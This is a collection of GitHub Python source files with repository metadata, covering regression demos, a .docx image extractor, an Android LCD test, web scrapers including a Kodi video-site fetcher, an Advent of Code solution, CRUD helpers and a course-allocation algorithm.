self.assertGreaterEqual(sublist[1], sublist[0])\n\n def test_output_dimensions(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 10\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n self.assertEqual(len(domain_x), N * N)\n self.assertEqual(len(domain_y), N * N)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"IdePHICS/RobustRegression","sub_path":"tests_robust_regression/test_utils/test_integration_utils.py","file_name":"test_integration_utils.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27609702172","text":"#Regularization applied on Linear Regression\n\n#Importing Libraries\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n#Import the Dataset \ndataset = pd.read_csv('Salary_Data.csv')\nX = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,1].values\n\n#Splitting the dataset into test set and training set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 1/3, random_state = 0)\n \n#Fitting Simple Linear Regression to the Training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n#Using Ridge Regression\nfrom sklearn.linear_model import Ridge\nrr = Ridge(alpha = 100)#large value of alpha is taken to display the difference in the ridge and linear regeression\nrr.fit(X_train, y_train)\n\n#Using Lasso regression\nfrom sklearn.linear_model import Lasso\nlr = Lasso(alpha = 10000)#alpha here is taken larger as the number of parameters are small and no. of useless parameters are very low\n#10000 is taken to clearly visualize lasso regrssion on the plot\nlr.fit(X_train, y_train)\n\n#Visualising the training results \nplt.scatter(X_train, y_train, color = 'red')\nplt.plot(X_train, regressor.predict(X_train), color = 'green')\nplt.plot(X_train, rr.predict(X_train), color = 'blue')\nplt.plot(X_train, lr.predict(X_train), color = 'yellow')\nplt.title(\"salary vs experience (training set)\")\nplt.xlabel(\"Years of experience\")\nplt.ylabel(\"Salary\")\nplt.show()\n\n","repo_name":"Somesh-Pant/ML-NLP-ANN-CNN-templates-spyder-","sub_path":"Machine learning/models/Regularization/Ridge_Regression(LR).py","file_name":"Ridge_Regression(LR).py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29540406699","text":"import zipfile\r\nimport re\r\nimport os\r\n\r\ncount = 0\r\n\r\n# Extract .docx file, get a a list of its files and a sublist of its images,\r\n# then read them and rewrite them in the 'Imágenes recuperadas' folder\r\n# with a proper name (name of the .docx file + number of image + extension)\r\ndef ext_im(docnam, cont):\r\n try:\r\n document = zipfile.ZipFile(docnam)\r\n filelist = document.namelist()\r\n\r\n imagelist = [filename for filename in filelist if re.search('.*image.*', filename)]\r\n imagelist.sort()\r\n\r\n print('\\n List of images in', docnam, ':', '\\n', imagelist, '\\n')\r\n\r\n if not os.path.isdir('Imágenes recuperadas'): os.mkdir('Imágenes recuperadas')\r\n\r\n for image in imagelist:\r\n imgdata = document.read(image)\r\n# This line would just get the name of the .docx file, with no full path\r\n# image_pre = re.findall('([^\\\\\\]+)\\.', docnam)[0] + '_'\r\n image_pre = docnam.replace('\\\\', '-')\r\n image_pre = re.findall('.-(.+)\\.', image_pre)[0] + '_'\r\n image_ext = re.findall('([0-9]+\\..{2,4}$)', image)[0]\r\n imagename = image_pre + image_ext\r\n imagepath = os.path.join('Imágenes recuperadas', imagename)\r\n if os.path.exists(imagepath): continue\r\n print('Extrating image:', imagename)\r\n fhand = open(imagepath, 'wb')\r\n fhand.write(imgdata)\r\n fhand.close()\r\n cont = cont + 1\r\n document.close()\r\n except:\r\n print('\\n No way to extract images from:', docnam)\r\n return cont\r\n\r\n# Walk the whole tree of folders and extract images from the .docx files found\r\nfor (nombredir, dirs, ficheros) in os.walk('.'):\r\n for nombrefichero in ficheros:\r\n if not (nombrefichero.endswith('.doc') or nombrefichero.endswith('.docx')): continue\r\n# The following lines make the loop to extract images only from files which\r\n# name contains some key-words related to controls, exams...\r\n key_words = ['control', 'examen', 'exámenes', 'evaluación', 'evaluacion',\r\n 'recuperación', 'recuperacion', 'rec']\r\n flag = 0\r\n for key_word in key_words:\r\n if re.search(key_word, nombrefichero.lower()):\r\n flag = 1\r\n if flag == 0: continue\r\n###\r\n elfichero = os.path.join(nombredir, nombrefichero)\r\n count = ext_im(elfichero, count)\r\n\r\nprint('\\n', 'Number of images extracted:', count)\r\n","repo_name":"Mjbarber/formulas","sub_path":"imgextract.py","file_name":"imgextract.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41982431422","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom uiautomator import Device\nfrom time import sleep\nfrom nose.tools import assert_equal\nfrom nose.tools import assert_not_equal\nfrom nose.tools import assert_raises\nfrom nose.tools import raises\nimport utility.common as u\nfrom utility.setdisplaytimeout import setDisplayTimeout\nclass Testlcd(object):\n @classmethod\n def setup_class(self):\n \"\"\"This method is run once for each class before any tests are run\"\"\"\n #Initial value (criterion )\n self.fixture_serial_no = \"f0e673e1\"\n self.DUT_serial_no = \"70400121\"\n self.lux_max_lcd_on = 50\n self.lux_min_lcd_on = 40\n self.lux_max_lcd_off = 10\n self.lux_min_lcd_off = 20\n #================================\n # get params from unittest.ini\n #================================\n self.fixture_serial_no = u.getparas('lcd','fixture_serial_no')\n self.DUT_serial_no = u.getparas('lcd','DUT_serial_no')\n self.lux_max_lcd_on = float(u.getparas('lcd','lux_max_lcd_on'))\n self.lux_min_lcd_on = float(u.getparas('lcd','lux_min_lcd_on'))\n self.lux_max_lcd_off = float(u.getparas('lcd','lux_max_lcd_off'))\n self.lux_min_lcd_off = float(u.getparas('lcd','lux_min_lcd_off'))\n #================================\n # Initial Fixture as self.f\n self.f = Device(self.fixture_serial_no)\n # Initial DUT as self.d\n self.d = Device(self.DUT_serial_no)\n #Install Meter toolbox apk\n ret = self.f.server.adb.cmd(\"install -r ./Meter\\ Toolbox_1.1.2_14.apk\").communicate()\n if not ret:\n print(\"Failure to install Meter Toolbox apk\")\n else:\n print(\"install Meter toolbox apk sucessfuly\")\n # Install Display Tester apk\n ret = self.d.server.adb.cmd(\"install -r ./Display\\ Tester_1.2_4.apk\").communicate()\n if not ret:\n print(\"Failure to install Display Tester apk\")\n else:\n print(\"Sucessful to install Display Tester apk\")\n @classmethod\n def teardown_class(self):\n \"\"\"This method is run once for each class _after_ all tests are run\"\"\"\n #Uninstall Meter toolbox apk\n #get package name by \"adb shell pm list packages | grep \"meter\"\n ret = self.f.server.adb.cmd(\"uninstall com.jkfantasy.meterbox\").communicate()\n if not ret:\n print(\"Failure to uninstall Meter Toolbox apk\")\n else:\n print(\"Sucessful to uninstall Meter Toolbox apk\")\n ret = self.d.server.adb.cmd(\"uninstall com.sain.device.displaytest\").communicate()\n if not ret:\n print(\"Failure to uninstall Display Tester apk\")\n else:\n print(\"Sucessful to uninstall Display Tester apk\")\n\n\n def setUp(self):\n \"\"\"This method is run once before _each_ test method is executed\"\"\"\n u.setup(self.d)\n u.setup(self.f)\n def teardown(self):\n \"\"\"This method is run once after _each_ test method is executed\"\"\"\n u.teardown(self.d)\n u.teardown(self.f)\n def test_lcd_off(self):\n print(\"Test LCD OFF\")\n self.d.server.adb.cmd(\"shell am start -n com.sain.device.displaytest/.Main\").communicate()\n self.d.wait.update()\n #show Black screen\n self.d(className=\"android.widget.Button\",resourceId=\"com.sain.device.displaytest:id/lcdblack\").click()\n self.d.screen.off() \n # Change to light meter tab in fixure device\n self.f.server.adb.cmd(\"shell am start -n com.jkfantasy.meterbox/.MainActivity\").communicate()\n self.f.wait.update()\n self.f(resourceId=\"com.jkfantasy.meterbox:id/btn_tab1\").click()\n # Wait 3 seconds to get lux\n sleep(3)\n self.f(resourceId=\"com.jkfantasy.meterbox:id/btn_pause\").click()\n min=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_min_value\").text\n max=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_max_value\").text\n avg=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_avg_value\").text\n cur=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_cur_value\").text\n print(\"light_min = %3.2f\" % float(min))\n print(\"light_max = %3.2f\" % float(max))\n print(\"light_avg = %3.2f\" % float(avg))\n print(\"light_cur = %3.2f\" % float(cur))\n self.d.screen.on() \n self.d.press.back()\n assert (float(avg) >= self.lux_min_lcd_off) and (float(avg) <= self.lux_max_lcd_off)\n def test_lcd_on(self):\n print(\"Test LCD ON\")\n # Set Display timeout to maximum (30 minutes) on DUT before testing.\n setDisplayTimeout(self.d,\"30min\")\n\n self.d.server.adb.cmd(\"shell am start -n com.sain.device.displaytest/.Main\").communicate()\n self.d.wait.update()\n #show White screen\n self.d(className=\"android.widget.Button\",resourceId=\"com.sain.device.displaytest:id/lcdwhite\").click()\n self.d.screen.on() \n # Change to light meter tab\n self.f.server.adb.cmd(\"shell am start -n com.jkfantasy.meterbox/.MainActivity\").communicate()\n self.f.wait.update()\n self.f(resourceId=\"com.jkfantasy.meterbox:id/btn_tab1\").click()\n # Wait 3 seconds to get lux\n sleep(3)\n self.f(resourceId=\"com.jkfantasy.meterbox:id/btn_pause\").click()\n min=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_min_value\").text\n max=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_max_value\").text\n avg=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_avg_value\").text\n cur=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_cur_value\").text\n print(\"light_min = %3.2f\" % float(min))\n print(\"light_max = %3.2f\" % float(max))\n print(\"light_avg = %3.2f\" % float(avg))\n print(\"light_cur = %3.2f\" % float(cur))\n self.d.press.back()\n assert (float(avg) >= self.lux_min_lcd_on) and (float(avg) <= self.lux_max_lcd_on)\n \nif __name__ == '__main__':\n lcd=Testlcd()\n lcd.setUp()\n lcd.test_lcd_on()\n lcd.test_lcd_off()\n lcd.teardown()\n","repo_name":"jimlin95/android_automated_test","sub_path":"testcase/lcd/test_lcd.py","file_name":"test_lcd.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72560233856","text":"import json\nimport requests\nfrom bs4 import BeautifulSoup\n\nagent = {\"User-Agent\":\"Mozilla/5.0\"}\n\ndef usnews_scrape():\n temp_dict = {}\n url_list = [] \n\n index_url = 'https://www.usnews.com/education/online-education/mba/search?mode=list&program=mba'\n response = requests.get(index_url, headers=agent)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n div_school_list = soup.find_all(\"div\", \n class_=\"padding-top-normal padding-bottom-normal padding-left-normal padding-right-normal\")\n #list of divs that capture each school\n\n for program_block in div_school_list:\n school = program_block.find(\"h3\", class_ = \"heading-large block-tighter\").find(\"a\").text.strip() #name of school\n state = program_block.find(\"div\", class_= \"block-normal text-small\").text[-2:] #state located\n rank = program_block.find(\"div\", class_=\"text-strong\").find(\"div\").text.strip()[1:3].strip() #rank on us news\n \n school_url = program_block.find(\"h3\", class_ = \"heading-large block-tighter\").find(\"a\")[\"href\"]\n url_list.append(school_url)\n response = requests.get(school_url, headers=agent)\n soup = BeautifulSoup(response.text, \"html.parser\")\n is_tuition = soup.find(attrs={\"data-test-id\":\"G_PT_IN_STATE_TUITION\"}).text.strip()[1:] #in state tuition per credit, part-time\n os_tuition = soup.find(attrs={\"data-test-id\":\"G_PT_OUT_STATE_TUITION\"}).text.strip()[1:] #out of state tuition per credit, part-time\n is_total = soup.find(attrs={\"data-test-id\":\"STUDENT_FEES_TOTPT_IN_MINUS0_5\"}).text.strip()[1:] #in state tuition total, part-time\n os_total = soup.find(attrs={\"data-test-id\":\"STUDENT_FEES_TOTPT_OUT_MINUS0_5\"}).text.strip()[1:] #out of state tuition total, part-time\n all_online = soup.find(attrs={\"data-test-id\":\"ONLINE_COMPLETENESS\"}).text.strip() #can the program be completed entirely online\n \n temp_dict[school] = {'state':state, 'rank':rank, 'is_tuition':is_tuition, \n 'os_tuition':os_tuition, 'is_total':is_total, \n 'os_total':os_total, 'all_online':all_online\n }\n return temp_dict\n\nusnews_dict = usnews_scrape()\n\nwith open('usnews_data.json', 'w') as f: #creates file in C:\\PogramFiles(x86)\\Notepad++ by default\n json.dump(usnews_dict, f)\n","repo_name":"nickcook530/mbafford","sub_path":"mba_functions.py","file_name":"mba_functions.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10536589660","text":"# -*- coding: UTF-8 -*-\nfrom ....fetchers.porn_fetcher import PornFetcher\nfrom ....tools.external_fetchers import ExternalFetcher\n\n# Internet tools\nfrom .... import urlparse, urljoin, quote_plus\n\n# Regex\nimport re\n\n# Warnings and exceptions\nimport warnings\n\n# Nodes\nfrom ....catalogs.porn_catalog import PornCatalogCategoryNode, PornCatalogVideoPageNode, VideoSource, VideoNode\nfrom ....catalogs.porn_catalog import PornCategories, PornFilter, PornFilterTypes\n\n\nclass Porn00(PornFetcher):\n @property\n def max_pages(self):\n \"\"\"\n Most viewed videos page url.\n :return:\n \"\"\"\n return 2000\n\n @property\n def object_urls(self):\n return {\n PornCategories.CATEGORY_MAIN: 'http://www.porn00.org/categories/',\n PornCategories.MOST_VIEWED_VIDEO: 'http://www.porn00.org/most-viewed/',\n PornCategories.SEARCH_MAIN: 'http://www.porn00.org/',\n }\n\n @property\n def _default_sort_by(self):\n return {\n PornCategories.MOST_VIEWED_VIDEO: PornFilterTypes.PopularityOrder,\n }\n\n @property\n def base_url(self):\n \"\"\"\n Base site url.\n :return:\n \"\"\"\n return 'http://www.porn00.org/'\n\n def _set_video_filter(self):\n \"\"\"\n Sets the video filters and the default values of the current filters\n :return:\n \"\"\"\n video_filters = {'sort_order': ((PornFilterTypes.PopularityOrder, 'Top', None),\n ),\n 'period_filters': ([(PornFilterTypes.OneDate, 'Today', None),\n (PornFilterTypes.TwoDate, 'This Week', 'week'),\n (PornFilterTypes.ThreeDate, 'This Month', 'month'),\n (PornFilterTypes.AllDate, 'Ever', 'ever'),\n ],\n [('sort_order', [PornFilterTypes.PopularityOrder])]),\n }\n self._video_filters = PornFilter(data_dir=self.fetcher_data_dir,\n video_args=video_filters,\n )\n\n def __init__(self, source_name='Porn00', source_id=0, store_dir='.', data_dir='../Data',\n source_type='Porn', use_web_server=True, session_id=None):\n \"\"\"\n C'tor\n :param source_name: save directory\n \"\"\"\n super(Porn00, self).__init__(source_name, source_id, store_dir, data_dir, source_type, use_web_server,\n session_id)\n self.external_fetchers = ExternalFetcher(session=self.session, user_agent=self.user_agent,\n parser=self.parser)\n\n def _update_available_categories(self, category_data):\n \"\"\"\n Fetches all the available shows.\n :return: Object of all available shows (JSON).\n \"\"\"\n page_request = self.get_object_request(category_data)\n tree = self.parser.parse(page_request.text)\n categories = [x for x in tree.xpath('.//div[@class]') if 'post-con categories' in x.attrib['class']]\n res = []\n for category in categories:\n link = category.xpath('./div[@class=\"image\"]/a')\n assert len(link) == 1\n\n image = category.xpath('./div[@class=\"image\"]/a/img')\n assert len(image) == 1\n\n title = category.xpath('./div[@class=\"title-con tk\"]/span/a')\n assert len(title) == 1\n\n object_data = PornCatalogCategoryNode(catalog_manager=self.catalog_manager,\n obj_id=link[0].attrib['href'],\n url=urljoin(self.base_url, link[0].attrib['href']),\n title=title[0].text.title(),\n image_link=image[0].attrib['src'],\n object_type=PornCategories.CATEGORY,\n super_object=category_data,\n )\n res.append(object_data)\n category_data.add_sub_objects(res)\n return res\n\n def _get_video_links_from_video_data_no_exception_check(self, video_data):\n \"\"\"\n Extracts Video link from the video page without taking care of the exceptions (being done on upper level).\n :param video_data: Video data (dict).\n :return:\n \"\"\"\n org_request = self.get_object_request(video_data)\n org_tree = self.parser.parse(org_request.text)\n tmp_url = org_tree.xpath('.//div[@class=\"video-con\"]/iframe')\n original_tmp_url = tmp_url[0].attrib['src']\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;'\n 'q=0.8,application/signed-exchange;v=b3*',\n 'Cache-Control': 'max-age=0',\n # 'Host': self.host_name,\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'same-origin',\n 'Sec-Fetch-User': '?1',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': self.user_agent\n }\n tmp_request = self.session.get(original_tmp_url, headers=headers)\n tmp_tree = self.parser.parse(tmp_request.text)\n\n videos = [VideoSource(link=x.attrib['src'], resolution=int(re.findall(r'\\d+', x.attrib['title'])[0]))\n for x in tmp_tree.xpath('.//source')]\n\n alternatives = [x for x in org_tree.xpath('.//div[@id=\"alternatives\"]/p/a') if 'Alternative' in x.text]\n for alternative in alternatives:\n tmp_url = alternative.attrib['href']\n tmp_request = self.session.get(tmp_url, headers=headers)\n tmp_tree = self.parser.parse(tmp_request.text)\n new_source = tmp_tree.xpath('.//div[@class=\"video-con\"]/iframe/@src')\n if urlparse(new_source[0]).hostname == 'verystream.com':\n # Not available anymore...\n # videos.extend([VideoSource(link=x[0], resolution=x[1])\n # for x in self.external_fetchers.get_video_link_from_verystream(new_source[0])])\n continue\n else:\n warnings.warn('Unknown source {h}...'.format(h=urlparse(new_source[0]).hostname))\n\n assert len(videos) > 0\n videos.sort(key=lambda x: x.resolution, reverse=True)\n\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;'\n 'q=0.8,application/signed-exchange;v=b3*',\n 'Cache-Control': 'max-age=0',\n # 'Host': self.host_name,\n 'Referer': original_tmp_url,\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'same-origin',\n 'Sec-Fetch-User': '?1',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': self.user_agent\n }\n\n return VideoNode(video_sources=videos, headers=headers)\n\n def _get_number_of_sub_pages(self, category_data, fetched_request=None, last_available_number_of_pages=None):\n \"\"\"\n Extracts category number of videos out of category data.\n :param fetched_request:\n :param category_data: Category data (dict).\n :return:\n \"\"\"\n # We perform binary search\n if category_data.object_type in (PornCategories.CATEGORY_MAIN, PornCategories.MOST_VIEWED_VIDEO):\n return 1\n else:\n return self._binary_search_max_number_of_pages(category_data, last_available_number_of_pages)\n\n def _get_available_pages_from_tree(self, tree):\n \"\"\"\n In binary looks for the available pages from current page tree.\n :param tree: Current page tree.\n :return: List of available trees\n \"\"\"\n return ([int(x) for x in tree.xpath('.//div[@class=\"donw pagination col-md-12\"]/ul/li/a/text()')\n if x.isdigit()] +\n [int(x) for x in tree.xpath('.//div[@class=\"donw pagination col-md-12\"]/ul/li/text()')\n if x.isdigit()])\n\n @property\n def _binary_search_page_threshold(self):\n \"\"\"\n Available pages threshold. 1 by default.\n \"\"\"\n return 2\n\n def get_videos_data(self, page_data):\n \"\"\"\n Gets videos data for the given category.\n :param page_data: Page data.\n :return:\n \"\"\"\n page_request = self.get_object_request(page_data)\n tree = self.parser.parse(page_request.text)\n videos = tree.xpath('.//div[@class=\"post-con\"]')\n res = []\n for video_tree_data in videos:\n if 'style' in video_tree_data.attrib:\n continue\n\n link = video_tree_data.xpath('./div[@class=\"image\"]/a')\n assert len(link) == 1\n\n image = video_tree_data.xpath('./div[@class=\"image\"]/a/img/@src')\n assert len(image) == 1\n\n title = video_tree_data.xpath('./div[@class=\"title-con\"]/span[@class=\"heading\"]/a/text()')\n assert len(title) == 1\n\n categories = video_tree_data.xpath('./div[@class=\"title-con\"]/span[@class=\"title k5\"]/span[@class=\"p5\"]/a')\n assert len(categories) > 0\n additional_data = {'categories': [(x.text.title(), x.attrib['href']) for x in categories]}\n\n date_added = video_tree_data.xpath('./div[@class=\"title-con\"]/span[@class=\"title k5\"]/h4[@class=\"dunk\"]/'\n 'text()')\n assert len(date_added) == 1\n\n video_data = PornCatalogVideoPageNode(catalog_manager=self.catalog_manager,\n obj_id=link[0].attrib['href'],\n url=urljoin(self.base_url, link[0].attrib['href']),\n title=title[0],\n image_link=image[0],\n additional_data=additional_data,\n added_before=date_added[0],\n object_type=PornCategories.VIDEO,\n super_object=page_data,\n )\n res.append(video_data)\n page_data.add_sub_objects(res)\n return res\n\n def _get_page_request_logic(self, page_data, params, page_number, true_object, page_filter, fetch_base_url):\n split_url = fetch_base_url.split('/')\n conditions = self.get_proper_filter(page_data).conditions\n true_sort_filter_id = self._default_sort_by[true_object.object_type] \\\n if true_object.object_type in self._default_sort_by \\\n else page_filter.sort_order.filter_id\n\n if (\n page_filter.period.value is not None and\n (conditions.period.sort_order is None or true_sort_filter_id in conditions.period.sort_order)\n ):\n split_url[-2] += '-' + page_filter.period.value\n\n if page_number is not None and page_number != 1:\n if len(split_url[-1]) > 0:\n split_url.append('')\n split_url.insert(-1, 'page')\n split_url.insert(-1, str(page_number))\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;'\n 'q=0.8,application/signed-exchange;v=b3',\n 'Cache-Control': 'max-age=0',\n 'Referer': self.base_url,\n 'Host': self.host_name,\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'same-origin',\n 'Sec-Fetch-User': '?1',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': self.user_agent\n }\n\n fetch_base_url = '/'.join(split_url)\n page_request = self.session.get(fetch_base_url, headers=headers, params=params)\n return page_request\n\n def _prepare_new_search_query(self, query):\n \"\"\"\n Searches for the wanted episode.\n :param query: Search query.\n :return: List of Video objects.\n \"\"\"\n return self.object_urls[PornCategories.SEARCH_MAIN] + '?s={q}'.format(q=quote_plus(query))\n\n @property\n def __version(self):\n return 0\n\n @property\n def _version_stack(self):\n return super(Porn00, self)._version_stack + [self.__version]\n","repo_name":"wankkodi/wank","sub_path":"plugin.video.WankWankWank/resources/lib/Fetchers/hidden/PornSites/porn00/porn00.py","file_name":"porn00.py","file_ext":"py","file_size_in_byte":12632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20815219467","text":"\"\"\"Advent of Code 2021 day 06\"\"\"\n\nfrom collections import defaultdict\n\n\n# Part 1 - start with a naive, brute force evolution\ndef evolve(fish):\n # spawn new fish\n newfish = []\n for i in range(len(fish)):\n if fish[i] == 0:\n fish[i] = 6\n newfish.append(8)\n else:\n # decrement counters\n fish[i] -= 1\n # add newly spawned fish\n fish += newfish\n return len(fish)\n\n\n# part 2 - too many generations for naive brute force: work with counts of fish\n# per age value\ndef fishcounter(fish):\n counts = defaultdict(int)\n for i in fish:\n counts[i] += 1\n return counts\n\n\ndef evolve2(fishcounts):\n _tmp = fishcounts[0]\n for i in range(6):\n fishcounts[i] = fishcounts[i + 1]\n fishcounts[6] = _tmp + fishcounts[7]\n fishcounts[7] = fishcounts[8]\n fishcounts[8] = _tmp\n return sum(fishcounts.values())\n\n\ndef iterated_evolve(state, generations, evolver=evolve):\n for i in range(generations):\n res = evolver(state)\n return res\n\n\ndef part1(fish):\n return iterated_evolve(fish, 80)\n\n\ndef part2(fish):\n fishcounts = fishcounter(fish)\n return iterated_evolve(fishcounts, 256, evolve2)\n\n\ndef parse_input(input_fd):\n data = input_fd.readline()\n return list(map(int, data.strip().split(',')))\n\n\nif __name__ == '__main__':\n with open('input.txt') as fd:\n fish = parse_input(fd)\n\n print('Part1: ', part1(fish.copy())) # copy here so we can use `fish` in p2\n print('Part2: ', part2(fish))\n","repo_name":"MarkNOakden/AdventOfCode","sub_path":"21/06/day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"7331395319","text":"from app.schemas.driver import DriverCreate, DriverUpdate\nfrom app.models.driver import Driver\nfrom app.database.db import SessionLocal\n\n\n# Create a new driver\ndef create_driver(driver_data: DriverCreate):\n with SessionLocal() as session:\n driver = Driver(**driver_data.dict())\n session.add(driver)\n session.commit()\n session.refresh(driver)\n return driver.id\n\n\n# Get a driver by ID\ndef get_driver_details(driver_id: int):\n with SessionLocal() as session:\n driver = session.query(Driver).get(driver_id)\n if driver:\n return driver\n else:\n raise ValueError(\"Driver not found.\")\n\n\n# Update driver details\ndef update_driver(driver_id: int, driver_data: DriverUpdate):\n with SessionLocal() as session:\n driver = session.query(Driver).get(driver_id)\n if driver:\n for field, value in driver_data.dict(exclude_unset=True).items():\n setattr(driver, field, value)\n session.commit()\n else:\n raise ValueError(\"Driver not found.\")\n\n\n# Delete a driver\ndef delete_driver(driver_id: int):\n with SessionLocal() as session:\n driver = session.query(Driver).get(driver_id)\n if driver:\n session.delete(driver)\n session.commit()\n return driver.id\n else:\n raise ValueError(\"Driver not found.\")\n\n\n# Get all drivers\ndef get_all_drivers():\n with SessionLocal() as session:\n drivers = session.query(Driver).all()\n return drivers\n","repo_name":"Danny10ison/icard","sub_path":"app/database/crud/crud_driver.py","file_name":"crud_driver.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31381490959","text":"'''\nITERATIVE ALLOCATION FRAMEWORK - IAF\nThis file contains the main allocation algorithm. (Algorithm description available in README)\n\nInput: List of Course objects and Student objects\nOutput: Courses allocated to students and updated in the input objects itself.\n\n'''\n\nfrom random import sample\n\nclass IAF:\n def __init__(self, courses: list, students: list):\n self.C = courses # List of Course Objects\n self.c2C = {c.code:c for c in self.C} # Map: Course Code -> Course object\n self.S = students # List of Students\n self.max_req = max([s.req for s in self.S]) # Maximum number of courses required by any student\n\n # Few Insight Variables\n self.total_allocations = 0 # Total number of allocations\n self.total_required_allocations = sum([s.req for s in self.S]) # Total number of required allocations\n \n # Private Var\n self.student_slots = {s.roll:set() for s in students} # Map: Student Roll No -> Slots allotted\n\n def run(self):\n # Main Code\n # Check README for algorithm description\n\n for req_num in range(1,self.max_req+1):\n curr_C = [c for c in self.C if c.rem > 0] # Remaining Courses\n curr_S = [s for s in self.S if s.req >= req_num] # Students who require at least 'req_num' courses\n \n while len(curr_S)>0 and len(curr_C)>0:\n self.allocate(curr_C,curr_S,req_num)\n curr_C = [c for c in curr_C if c.rem>0]\n curr_S = [s for s in curr_S if s.latest_itr1:\n if output:\n print(\"Starting Pool of multiple workers...\") \n with mp.Pool(processes = processes) as pool:\n results = pool.starmap(fun, prms)\n elif len(prms)==1:\n if output:\n print(\"Running single process...\")\n results = fun(*prms[0])\n else:\n raise RuntimeWarning(\"Nothing to run! Please check input.\")\n return results\n\ndef split_up_roh_df(base_path, path_out, iid, \n file_in=\"roh_info.csv\", file_out=\"roh_gt.csv\"):\n \"\"\"Splits up the ROH-dataframe from base_path/file_in into file_out.\n Picks out Individual iid. Done to pass on \"ground truth\"\n base_path: Where to find roh_info.csv\n path_out: Where to save roh_gt to\n iid: Which Individual to extract from roh_info.csv.\"\"\"\n #path = base_path + \"roh_info.csv\"\n path = os.path.join(base_path, file_in)\n dft = pd.read_csv(path, sep=\"\\t\") # Load the Meta File\n\n save_df = dft[dft[\"iid\"] == iid]\n save_path = os.path.join(path_out, file_out)\n save_df.to_csv(save_path, sep=\"\\t\", index=False)\n #print(f\"Saved to {save_path}\")\n return\n\ndef get_sep_from_extension(path):\n \"\"\"Get Seperator for csv/tsv from file extensions.\n Either comma or tab. Return delimiter\"\"\"\n ext = os.path.splitext(path)[1]\n if ext==\".tsv\":\n sep=\"\\t\"\n elif ext==\".csv\":\n sep=\",\"\n else:\n raise RuntimeError(f\"Extension {ext} of {path} invalid!\")\n return sep\n \ndef combine_individual_data(base_path, iid, delete=False, chs=range(1,23), \n prefix_out=\"\", file=\"roh.csv\", file_result=\"_roh_full.csv\"):\n \"\"\"Function to merge data from one Individual Analysis (all Chromosome)\n chs: Which Chromosomes to combine\"\n file: Which files to combine. Either roh or ibd.csv\n delete: Whether to delete individual folder and contents after combining.\"\"\"\n if isinstance(iid, (list, np.ndarray)):\n assert(len(iid)==2) # Sanity Check\n iid = \"_\".join(iid) # If multiple individual names given (for X IBD)\n full_df_vec =[] # The full dataframe of inferred ROH blocks\n \n sep = get_sep_from_extension(file) #Get right seperator\n \n ### Walk through Chromosomes and combine the Dataframes\n for ch in chs:\n path_roh = os.path.join(base_path, str(iid), \"chr\"+str(ch), prefix_out, file) \n df_temp = pd.read_csv(path_roh, sep=sep)\n full_df_vec.append(df_temp)\n \n full_df = pd.concat(full_df_vec)\n \n ### Save to Path:\n path_save = os.path.join(base_path, str(iid) + file_result)\n full_df.to_csv(path_save, index=False)\n \n ### Delete files in folder if need\n if delete == True:\n for ch in chs:\n path_folder = os.path.join(base_path, str(iid), \"chr\"+str(ch), prefix_out, \"\") \n \n for root, _, files in os.walk(path_folder):\n for file in files:\n os.remove(os.path.join(root, file))\n os.rmdir(path_folder) # Remove the Chromosome Folders\n os.rmdir(os.path.join(base_path, str(iid), \"\")) # Remove the Individual Folder\n \n return full_df\n\ndef move_X_to_parent_folder(base_path, iid, delete=False, ch=23, \n prefix_out=\"\", file_result=\"_roh_full.csv\"):\n \"\"\"Take ROH result table from X folder, and move it to parent folder. \n Delete the original result folder\"\"\"\n iid_file = str(iid[0])+\"_\"+str(iid[1])\n path_roh = os.path.join(base_path, iid_file, \"chr\"+str(ch), prefix_out, \"roh.csv\") \n path_save = os.path.join(base_path, iid_file + file_result)\n \n copyfile(path_roh, path_save) # use shutil version\n \n ### Delete files in folder if 